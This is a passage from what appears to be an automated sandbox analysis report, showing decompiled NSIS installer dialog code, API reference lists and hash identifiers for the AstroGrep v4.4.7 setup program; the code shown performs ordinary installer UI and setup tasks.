                                                                                                            									_t73 = CreateDialogParamA( *0x42e400,  *_t130 +  *0x42dbe0 & 0x0000ffff, _t125, ("]@@")[ *(_t130 + 4)], _t130); // executed
                                                                                                            									__eflags = _t73 - _t133;
                                                                                                            									 *0x42dbd8 = _t73;
                                                                                                            									if(_t73 == _t133) {
                                                                                                            										goto L58;
                                                                                                            									}
                                                                                                            									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                                                                                            									_push(6);
                                                                                                            									E00403F14(_t73);
                                                                                                            									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                                                                                            									ScreenToClient(_t125, _t134 + 0x10);
                                                                                                            									SetWindowPos( *0x42dbd8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                                                                                            									_push(_t133);
                                                                                                            									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                                                                                            									__eflags =  *0x42dbcc - _t133; // 0x0
                                                                                                            									if(__eflags != 0) {
                                                                                                            										goto L61;
                                                                                                            									}
                                                                                                            									ShowWindow( *0x42dbd8, 8); // executed
                                                                                                            									E00403F60(0x405);
                                                                                                            									goto L58;
                                                                                                            								}
                                                                                                            								__eflags =  *0x42e48c - _t133;
                                                                                                            								if( *0x42e48c != _t133) {
									goto L61;
								}
								__eflags =  *0x42e480 - _t133;
								if( *0x42e480 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42dbd8); // executed
						 *0x42e408 = _t133;
						EndDialog(_t125,  *0x428c38);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42dbd8, 0x40f, 0, 1); // 0x40f = WM_USER + 0xf, an application-private message to the child page window
						__eflags =  *0x42dbcc - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4; // hwnd of the dialog
					_t133 = 0;
					if(_t115 == 0x47) { // WM_WINDOWPOSCHANGED
						SetWindowPos( *0x429848, _t125, 0, 0, 0, 0, 0x13); // 0x13 = SWP_NOSIZE | SWP_NOMOVE | SWP_NOACTIVATE
					}
					if(_t115 == 5) { // WM_SIZE; the same value 5 (SW_SHOW) is reused as the ShowWindow argument
						asm("sbb eax, eax");
						ShowWindow( *0x429848,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) { // 0x40d = WM_USER + 0xd, application-private: swap in a new child page window
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) { // 0x11 = WM_QUERYENDSESSION
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) { // 0x111 = WM_COMMAND
								L26:
								return E00403F7B(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff; // LOWORD(wParam) = control ID of the button
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) { // 1 = IDOK
									__eflags = _t132 - 3;
									if(_t132 != 3) { // 3 = third dialog button
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) { // 2 = IDCANCEL
											L25:
											SendMessageA( *0x42dbd8, 0x111, _a12, _a16); // forward any other WM_COMMAND to the child page window
											goto L26;
										}
										__eflags =  *0x42e48c - _t133;
										if( *0x42e48c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x428c38 = 1;
											L21:
											_push(0x78);
											L22:
											E00403EED();
											goto L26;
										}
										E0040140B(_t127);
										 *0x428c38 = _t127;
										goto L21;
									}
									__eflags = "\t" - _t133; // 0x9 (decompiler artefact: the constant 9 is rendered as the string "\t")
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133); // 0xf3 = BM_SETSTATE: clear the pushed state of the button
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133); // DWL_MSGRESULT (index 0) = FALSE: refuse WM_QUERYENDSESSION, i.e. block logoff/shutdown while the dialog is up
						return 1;
					} else {
						DestroyWindow( *0x42dbd8); // executed
						 *0x42dbd8 = _a12; // wParam carries the hwnd of the new child page window
						L58:
						_t141 =  *0x42a868 - _t133; // 0x1 (set once the main dialog has been shown)
						if(_t141 == 0) {
							_t142 =  *0x42dbd8 - _t133; // 0x8003a
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa); // executed; 0xa = SW_SHOWDEFAULT
								 *0x42a868 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
Instruction addresses for the decompiled statements above (the per-line address column did not survive extraction): the function body spans 0x00403a4a to 0x00403eb8; entries listed as 0x00000000 have no mapped address.
                                                                                                            0x00403a8f
                                                                                                            0x00403a9a
                                                                                                            0x00403a9a
                                                                                                            0x00403aa6
                                                                                                            0x00403ac2
                                                                                                            0x00403ac5
                                                                                                            0x00403ad8
                                                                                                            0x00403ade
                                                                                                            0x00403b81
                                                                                                            0x00000000
                                                                                                            0x00403b8a
                                                                                                            0x00403ae4
                                                                                                            0x00403af1
                                                                                                            0x00403af3
                                                                                                            0x00403af5
                                                                                                            0x00403b14
                                                                                                            0x00403b14
                                                                                                            0x00403b17
                                                                                                            0x00403b1c
                                                                                                            0x00403b1f
                                                                                                            0x00403b2f
                                                                                                            0x00403b30
                                                                                                            0x00403b32
                                                                                                            0x00403b68
                                                                                                            0x00403b7b
                                                                                                            0x00000000
                                                                                                            0x00403b7b
                                                                                                            0x00403b34
                                                                                                            0x00403b3a
                                                                                                            0x00403b53
                                                                                                            0x00403b58
                                                                                                            0x00403b5a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403b5c
                                                                                                            0x00403b48
                                                                                                            0x00403b48
                                                                                                            0x00403b4a
                                                                                                            0x00403b4a
                                                                                                            0x00000000
                                                                                                            0x00403b4a
                                                                                                            0x00403b3d
                                                                                                            0x00403b42
                                                                                                            0x00000000
                                                                                                            0x00403b42
                                                                                                            0x00403b21
                                                                                                            0x00403b27
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403b29
                                                                                                            0x00000000
                                                                                                            0x00403b29
                                                                                                            0x00403b19
                                                                                                            0x00000000
                                                                                                            0x00403b19
                                                                                                            0x00403aff
                                                                                                            0x00403b06
                                                                                                            0x00403b0c
                                                                                                            0x00403b0e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403b0e
                                                                                                            0x00403aca
                                                                                                            0x00000000
                                                                                                            0x00403aa8
                                                                                                            0x00403aae
                                                                                                            0x00403ab8
                                                                                                            0x00403ebe
                                                                                                            0x00403ebe
                                                                                                            0x00403ec4
                                                                                                            0x00403ec6
                                                                                                            0x00403ecc
                                                                                                            0x00403ed1
                                                                                                            0x00403ed7
                                                                                                            0x00403ed7
                                                                                                            0x00403ecc
                                                                                                            0x00403ee1
                                                                                                            0x00000000
                                                                                                            0x00403ee1
                                                                                                            0x00403aa6

APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
• ShowWindow.USER32(?), ref: 00403A9A
• DestroyWindow.USER32 ref: 00403AAE
• SetWindowLongA.USER32 ref: 00403ACA
• GetDlgItem.USER32 ref: 00403AEB
• SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
• IsWindowEnabled.USER32(00000000), ref: 00403B06
• GetDlgItem.USER32 ref: 00403BB4
• GetDlgItem.USER32 ref: 00403BBE
• KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403BD8
• SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
• GetDlgItem.USER32 ref: 00403CCF
• ShowWindow.USER32(00000000,?), ref: 00403CF0
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D1D
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
• EnableMenuItem.USER32 ref: 00403D3A
• SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
• SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
• lstrlenA.KERNEL32(AstroGrep v4.4.7 Setup ,?,AstroGrep v4.4.7 Setup ,AstroGrep v4.4.7 Setup), ref: 00403D8E
• SetWindowTextA.USER32(?,AstroGrep v4.4.7 Setup ), ref: 00403D9D
• ShowWindow.USER32(?,0000000A), ref: 00403ED1
Strings
Memory Dump Source
• Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
Similarity
• API ID: Window$Item$MessageSend$CallbackDispatcherShowUser$Menu$DestroyEnableEnabledLongSystemTextlstrlen
• String ID: AstroGrep v4.4.7 Setup$AstroGrep v4.4.7 Setup
• API String ID: 2523155381-1903755671
• Opcode ID: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
• Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
• Opcode Fuzzy Hash: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
• Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 96%
E004036AF(void* __eflags) {
	intOrPtr _v4;
	intOrPtr _v8;
	int _v12;
	void _v16;
	void* __ebx;
	void* __edi;
	void* __esi;
	intOrPtr* _t17;
	void* _t25;
	void* _t27;
	int _t28;
	void* _t31;
	int _t34;
	int _t35;
	intOrPtr _t36;
	int _t39;
	char _t57;
	CHAR* _t59;
	signed char _t63;
	CHAR* _t74;
	intOrPtr _t76;
	CHAR* _t81;

	_t76 =  *0x42e410;
	_t17 = E004060C8(2);
	_t84 = _t17;
	if(_t17 == 0) {
		_t74 = 0x429868;
		"1033" = 0x30;
		 *0x435001 = 0x78;
		 *0x435002 = 0;
		E00405C16(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x429868, 0);
		__eflags =  *0x429868; // 0x41
		if(__eflags == 0) {
			E00405C16(0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040735A, 0x429868, 0);
		}
		lstrcatA("1033", _t74);
	} else {
		E00405C8D("1033",  *_t17() & 0x0000ffff);
	}
	E00403974(_t71, _t84);
	_t80 = "C:\\Program Files (x86)\\AstroGrep";
	 *0x42e480 =  *0x42e418 & 0x00000020;
	 *0x42e49c = 0x10000;
	if(E0040588F(_t84, "C:\\Program Files (x86)\\AstroGrep") != 0) {
		L16:
		if(E0040588F(_t92, _t80) == 0) {
			E00405D51(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118))); // executed
		}
		_t25 = LoadImageA( *0x42e400, 0x67, 1, 0, 0, 0x8040); // executed
		 *0x42dbe8 = _t25;
		if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
			L21:
			if(E0040140B(0) == 0) {
				_t27 = E00403974(_t71, __eflags);
				__eflags =  *0x42e4a0;
				if( *0x42e4a0 != 0) {
					_t28 = E0040501A(_t27, 0);
					__eflags = _t28;
					if(_t28 == 0) {
						E0040140B(1);
						goto L33;
					}
					__eflags =  *0x42dbcc; // 0x0
					if(__eflags == 0) {
						E0040140B(2);
					}
					goto L22;
				}
				ShowWindow( *0x429848, 5); // executed
				_t34 = E0040605A("RichEd20"); // executed
				__eflags = _t34;
				if(_t34 == 0) {
					E0040605A("RichEd32");
				}
				_t81 = "RichEdit20A";
				_t35 = GetClassInfoA(0, _t81, 0x42dba0);
				__eflags = _t35;
				if(_t35 == 0) {
					GetClassInfoA(0, "RichEdit", 0x42dba0);
					 *0x42dbc4 = _t81;
					RegisterClassA(0x42dba0);
				}
				_t36 =  *0x42dbe0; // 0x0
				_t39 = DialogBoxParamA( *0x42e400, _t36 + 0x00000069 & 0x0000ffff, 0, E00403A41, 0); // executed
				E004035FF(E0040140B(5), 1);
				return _t39;
			}
			L22:
			_t31 = 2;
			return _t31;
		} else {
			_t71 =  *0x42e400;
			 *0x42dba4 = E00401000;
			 *0x42dbb0 =  *0x42e400;
			 *0x42dbb4 = _t25;
			 *0x42dbc4 = 0x4091f4;
			if(RegisterClassA(0x42dba0) == 0) {
				L33:
				__eflags = 0;
				return 0;
			}
			SystemParametersInfoA(0x30, 0,  &_v16, 0);
			 *0x429848 = CreateWindowExA(0x80, 0x4091f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42e400, 0);
			goto L21;
		}
	} else {
		_t71 =  *(_t76 + 0x48);
		if(_t71 == 0) {
			goto L16;
		}
		_t74 = 0x42d3a0;
                                                                                                            					E00405C16( *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42e438, 0x42d3a0, 0);
                                                                                                            					_t57 =  *0x42d3a0; // 0x52
                                                                                                            					if(_t57 == 0) {
                                                                                                            						goto L16;
                                                                                                            					}
                                                                                                            					if(_t57 == 0x22) {
                                                                                                            						_t74 = 0x42d3a1;
                                                                                                            						 *((char*)(E004057CC(0x42d3a1, 0x22))) = 0;
                                                                                                            					}
                                                                                                            					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                                                                            					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                                                                            						L15:
                                                                                                            						E00405D2F(_t80, E004057A1(_t74));
                                                                                                            						goto L16;
                                                                                                            					} else {
                                                                                                            						_t63 = GetFileAttributesA(_t74);
                                                                                                            						if(_t63 == 0xffffffff) {
                                                                                                            							L14:
                                                                                                            							E004057E8(_t74);
                                                                                                            							goto L15;
                                                                                                            						}
                                                                                                            						_t92 = _t63 & 0x00000010;
                                                                                                            						if((_t63 & 0x00000010) != 0) {
                                                                                                            							goto L15;
                                                                                                            						}
                                                                                                            						goto L14;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                              • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                              • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                            • lstrcatA.KERNEL32(1033,AstroGrep v4.4.7 Setup ,80000001,Control Panel\Desktop\ResourceLocale,00000000,AstroGrep v4.4.7 Setup ,00000000,00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" ,00000000), ref: 0040372A
                                                                                                            • lstrlenA.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Program Files (x86)\AstroGrep,1033,AstroGrep v4.4.7 Setup ,80000001,Control Panel\Desktop\ResourceLocale,00000000,AstroGrep v4.4.7 Setup ,00000000,00000002,74B5FA90), ref: 0040379F
                                                                                                            • lstrcmpiA.KERNEL32(?,.exe,Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Program Files (x86)\AstroGrep,1033,AstroGrep v4.4.7 Setup ,80000001,Control Panel\Desktop\ResourceLocale,00000000,AstroGrep v4.4.7 Setup ,00000000), ref: 004037B2
                                                                                                            • GetFileAttributesA.KERNEL32(Remove folder: ), ref: 004037BD
                                                                                                            • LoadImageA.USER32 ref: 00403806
                                                                                                              • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                                                                            • RegisterClassA.USER32 ref: 00403843
                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
                                                                                                            • CreateWindowExA.USER32 ref: 00403890
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 004038C6
                                                                                                            • GetClassInfoA.USER32 ref: 004038F2
                                                                                                            • GetClassInfoA.USER32 ref: 004038FF
                                                                                                            • RegisterClassA.USER32 ref: 00403908
                                                                                                            • DialogBoxParamA.USER32 ref: 00403927
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" $.DEFAULT\Control Panel\International$.exe$1033$AstroGrep v4.4.7 Setup $C:\Program Files (x86)\AstroGrep$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                            • API String ID: 1975747703-498010037
                                                                                                            • Opcode ID: bbcc0ab7bdbe30227ddd5912a7935d2a12b8b01ad7e03ac62d617ac8d3ddabba
                                                                                                            • Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
                                                                                                            • Opcode Fuzzy Hash: bbcc0ab7bdbe30227ddd5912a7935d2a12b8b01ad7e03ac62d617ac8d3ddabba
                                                                                                            • Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 94%
                                                                                                            			E0040405D(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                                                            				char* _v8;
                                                                                                            				signed int _v12;
                                                                                                            				void* _v16;
                                                                                                            				struct HWND__* _t52;
                                                                                                            				long _t86;
                                                                                                            				int _t98;
                                                                                                            				struct HWND__* _t99;
                                                                                                            				signed int _t100;
                                                                                                            				intOrPtr _t103;
                                                                                                            				signed int _t106;
                                                                                                            				intOrPtr _t107;
                                                                                                            				intOrPtr _t109;
                                                                                                            				int _t110;
                                                                                                            				signed int* _t112;
                                                                                                            				signed int _t113;
                                                                                                            				char* _t114;
                                                                                                            				CHAR* _t115;
                                                                                                            
                                                                                                            				if(_a8 != 0x110) {
                                                                                                            					__eflags = _a8 - 0x111;
                                                                                                            					if(_a8 != 0x111) {
                                                                                                            						L11:
                                                                                                            						__eflags = _a8 - 0x4e;
                                                                                                            						if(_a8 != 0x4e) {
                                                                                                            							__eflags = _a8 - 0x40b;
                                                                                                            							if(_a8 == 0x40b) {
                                                                                                            								 *0x428834 =  *0x428834 + 1;
                                                                                                            								__eflags =  *0x428834;
                                                                                                            							}
                                                                                                            							L25:
                                                                                                            							_t110 = _a16;
                                                                                                            							L26:
                                                                                                            							return E00403F7B(_a8, _a12, _t110);
                                                                                                            						}
                                                                                                            						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                                                            						_t110 = _a16;
                                                                                                            						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
                                                                                                            						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
                                                                                                            							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
                                                                                                            							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                                                            								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                                                            								_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                                                            								_v12 = _t100;
                                                                                                            								__eflags = _t100 - _t109 - 0x800;
                                                                                                            								_v16 = _t109;
                                                                                                            								_v8 = 0x42d3a0;
                                                                                                            								if(_t100 - _t109 < 0x800) {
                                                                                                            									SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                                                            									SetCursor(LoadCursorA(0, 0x7f02));
                                                                                                            									ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                                                                                            									SetCursor(LoadCursorA(0, 0x7f00));
                                                                                                            									_t110 = _a16;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
                                                                                                            						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
                                                                                                            							goto L26;
                                                                                                            						} else {
                                                                                                            							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
                                                                                                            							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                                                            								goto L26;
                                                                                                            							}
                                                                                                            							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
                                                                                                            							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                                                            								SendMessageA( *0x42e408, 0x111, 1, 0);
                                                                                                            							}
                                                                                                            							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
                                                                                                            							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                                                            								SendMessageA( *0x42e408, 0x10, 0, 0);
                                                                                                            							}
                                                                                                            							return 1;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					__eflags = _a12 >> 0x10;
                                                                                                            					if(_a12 >> 0x10 != 0) {
                                                                                                            						goto L25;
                                                                                                            					}
                                                                                                            					__eflags =  *0x428834; // 0x1
                                                                                                            					if(__eflags != 0) {
                                                                                                            						goto L25;
                                                                                                            					}
                                                                                                            					_t103 =  *0x429040; // 0x6eafd4
                                                                                                            					_t25 = _t103 + 0x14; // 0x6eafe8
                                                                                                            					_t112 = _t25;
                                                                                                            					__eflags =  *_t112 & 0x00000020;
                                                                                                            					if(( *_t112 & 0x00000020) == 0) {
                                                                                                            						goto L25;
                                                                                                            					}
                                                                                                            					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                                            					__eflags = _t106;
                                                                                                            					 *_t112 = _t106;
                                                                                                            					E00403F36(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                                            					E004042E7();
                                                                                                            					goto L11;
                                                                                                            				} else {
                                                                                                            					_t98 = _a16;
                                                                                                            					_t113 =  *(_t98 + 0x30);
                                                                                                            					if(_t113 < 0) {
                                                                                                            						_t107 =  *0x42dbdc; // 0x6fdecd
                                                                                                            						_t113 =  *(_t107 - 4 + _t113 * 4);
                                                                                                            					}
                                                                                                            					_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                                                            					_t114 = _t113 +  *0x42e438;
                                                                                                            					_push(0x22);
                                                                                                            					_a16 =  *_t114;
                                                                                                            					_v12 = _v12 & 0x00000000;
                                                                                                            					_t115 = _t114 + 1;
                                                                                                            					_v16 = _t115;
                                                                                                            					_v8 = E00404028;
                                                                                                            					E00403F14(_a4);
                                                                                                            					_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                                                            					_push(0x23);
                                                                                                            					E00403F14(_a4);
                                                                                                            					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                                            					E00403F36( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                                                            					_t99 = GetDlgItem(_a4, 0x3e8);
                                                                                                            					E00403F49(_t99);
                                                                                                            					SendMessageA(_t99, 0x45b, 1, 0);
                                                                                                            					_t86 =  *( *0x42e410 + 0x68);
                                                                                                            					if(_t86 < 0) {
                                                                                                            						_t86 = GetSysColor( ~_t86);
                                                                                                            					}
                                                                                                            					SendMessageA(_t99, 0x443, 0, _t86);
                                                                                                            					SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                                                            					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                                                            					 *0x428834 = 0;
                                                                                                            					SendMessageA(_t99, 0x449, _a16,  &_v16); // executed
                                                                                                            					 *0x428834 = 0;
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32 ref: 004040E8
                                                                                                            • GetDlgItem.USER32 ref: 004040FC
                                                                                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
                                                                                                            • GetSysColor.USER32(?), ref: 0040412B
                                                                                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
                                                                                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040414C
                                                                                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
                                                                                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
                                                                                                            • GetDlgItem.USER32 ref: 004041D2
                                                                                                            • SendMessageA.USER32(00000000), ref: 004041D5
                                                                                                            • GetDlgItem.USER32 ref: 00404200
                                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
                                                                                                            • LoadCursorA.USER32 ref: 0040424F
                                                                                                            • SetCursor.USER32(00000000), ref: 00404258
                                                                                                            • ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
                                                                                                            • LoadCursorA.USER32 ref: 00404278
                                                                                                            • SetCursor.USER32(00000000), ref: 0040427B
                                                                                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
                                                                                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                            • String ID: (@@$N$Remove folder: $open
                                                                                                            • API String ID: 3615053054-2165829399
                                                                                                            • Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                                                            • Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
                                                                                                            • Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                                                            • Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 80%
                                                                                                            			E00402C66(void* __eflags, signed int _a4) {
                                                                                                            				DWORD* _v8;
                                                                                                            				DWORD* _v12;
                                                                                                            				void* _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				long _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				intOrPtr _v36;
                                                                                                            				intOrPtr _v40;
                                                                                                            				signed int _v44;
                                                                                                            				long _t43;
                                                                                                            				signed int _t50;
                                                                                                            				void* _t53;
                                                                                                            				void* _t57;
                                                                                                            				intOrPtr* _t59;
                                                                                                            				long _t60;
                                                                                                            				signed int _t65;
                                                                                                            				signed int _t70;
                                                                                                            				signed int _t71;
                                                                                                            				signed int _t77;
                                                                                                            				intOrPtr _t80;
                                                                                                            				long _t82;
                                                                                                            				signed int _t85;
                                                                                                            				signed int _t87;
                                                                                                            				void* _t89;
                                                                                                            				signed int _t90;
                                                                                                            				signed int _t93;
                                                                                                            				void* _t94;
                                                                                                            
                                                                                                            				_t82 = 0;
                                                                                                            				_v12 = 0;
                                                                                                            				_v8 = 0;
                                                                                                            				_t43 = GetTickCount();
                                                                                                            				_t91 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\ASTROGREP_SETUP_V4.4.7.EXE";
                                                                                                            				 *0x42e40c = _t43 + 0x3e8;
                                                                                                            				GetModuleFileNameA(0, "C:\\Users\\hardz\\AppData\\Local\\Temp\\ASTROGREP_SETUP_V4.4.7.EXE", 0x400);
                                                                                                            				_t89 = E004059A2(_t91, 0x80000000, 3);
                                                                                                            				_v16 = _t89;
